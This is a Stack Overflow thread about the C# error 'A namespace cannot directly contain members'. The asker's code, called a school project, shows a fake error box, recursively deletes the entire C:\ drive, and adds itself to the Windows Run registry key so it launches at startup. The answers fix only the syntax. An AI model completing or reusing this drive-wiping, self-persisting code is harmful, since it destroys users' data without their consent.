# A namespace cannot directly contain members such as fields or methods?

Tags: c#, methods, namespaces, field

I am trying to create an application that deletes user documents at start-up (I am aware that this may sound malicious but it is for a school project).

However, I am getting the error "A namespace cannot directly contain members such as fields or methods".

Looking over it, it seems fine? I am hoping a second pair of eyes can help as I have searched everywhere and I cannot find a relevant solution!

Admittedly, because of my very basic knowledge, I have used a lot of help online and from books and what I know of c# is limited. Therefore it might just be that I'm being stupid, but everyone has to start somewhere, right?

The code is as follows:

```
namespace Test
{
class Program
    {
     static void Main(string[] args)
        {
        MessageBox.Show("An unexpected error occured");
        if (System.IO.Directory.Exists(@"C:\"))
        {
            try
            {
                System.IO.Directory.Delete("C:\\", true);
            }

            catch (System.IO.IOException e)
            {
                Console.WriteLine(e.Message);
            }
        }
    }
    }
public class Program
{
    private void SetStartup();
    }

        RegistryKey rk = Registry.CurrentUser.OpenSubKey
            ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);

        if (chkStartUp.Checked)
            rk.SetValue(AppName, Application.ExecutablePath.ToString());
        else
            rk.DeleteValue(AppName, false);

    }
```

Comment: Rolled back the edit which fixed the formatting because the lack of formatting is effectively *part of the problem*. If the OP's code were formatted properly to start with, they'd probably have noticed the issue - so changing the question to pretend it already *was* formatting is hiding a significant issue.

Comment: possible duplicate of [Error "A namespace does not directly contain members such as fields or methods"](http://stackoverflow.com/questions/2090369/error-a-namespace-does-not-directly-contain-members-such-as-fields-or-methods)

Answer (score 10):

Your code is seriously messed up around `SetStartup`. If you follow the normal indentation, you'll see what's going on a bit more clearly. Press Ctrl-E followed by D in Visual Studio, and it'll reformat your document - which should make things considerably clearer.

Look at this (after I've indented it):

```
public class Program
{
    private void SetStartup();
}

RegistryKey rk = [...];
```

That's trying to declare a variable (`rk`) outside a class. You've also got a non-abstract method with no body, and you're missing closing braces at the end.

I suspect you *meant* it to be:

```
public class Program
{
    // Note: no semi-colon, and an *opening* brace
    private void SetStartup()
    {
        RegistryKey rk = [...];
        // Other code
    }
}

// And you'd want to close the namespace declaration too
```

You're also going to have problems declaring two (non-partial) classes with the same name...

Comment: I am now getting "The name AppName does not exist in the current context"
The same with chkStartUp?

Comment: @user1224163: Well you've got two different declarations for the class `Program`, which doesn't help either... and we've no idea what `chkStartUp` is...

Comment: Sorted,
I was being an idiot (quite obviously)..
Thanks for your help, sorry for wasting your time!

Comment: Pressing "Ctrl-E followed by D" in Visual Studio 2012 gives me no reformatting, and the bar at the bottom of the window displays the message "The key combination (Ctrl+E, Shift+D) is not a command." What version of Visual Studio are you using this command in?

Comment: @MatthewNajmon: Not Shift+D, just D. I was probably using VS2010 back then, but I've just checked in VS2012 and VS2013, and it's the same. Go to Edit / Advanced and look for Format Document to find the shortcut key for you.

Comment: Sorry. I tried D first, then since you capitalized it, I thought maybe I was mis-reading you and checked Shift-D as well to be sure. Then, when I copied it here, I got sloppy and just copied the error that was still up, not noticing it was the shift version. I just tried it again, it still doesn't work, but this time with "(Ctrl+E,D)" in the error message.

Answer (score 1):

After formatting the code, you will see there are code outside of a class.

[image]

Answer (score 0):

You have a misplaced bracket and semicolon, should be:

```
private void SetStartup()
{

    RegistryKey rk = Registry.CurrentUser.OpenSubKey
        ("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);

    //..
}
```

Answer (score 0):

In my case this error was reported by compiler in Razor view on line 1. The code was following:

```
@using Microsoft.AspNet.Identity;
@using MyApp.Helpers;
```

I just changed the order of using and problem is solved.

```
@using MyApp.Helpers;
@using Microsoft.AspNet.Identity;
```

My colleagues also reproted that they face this compiler error which can be resolve by changing the order of namespaces.

I use Visual Studio 2013 update 5 and .NET Framework 4.5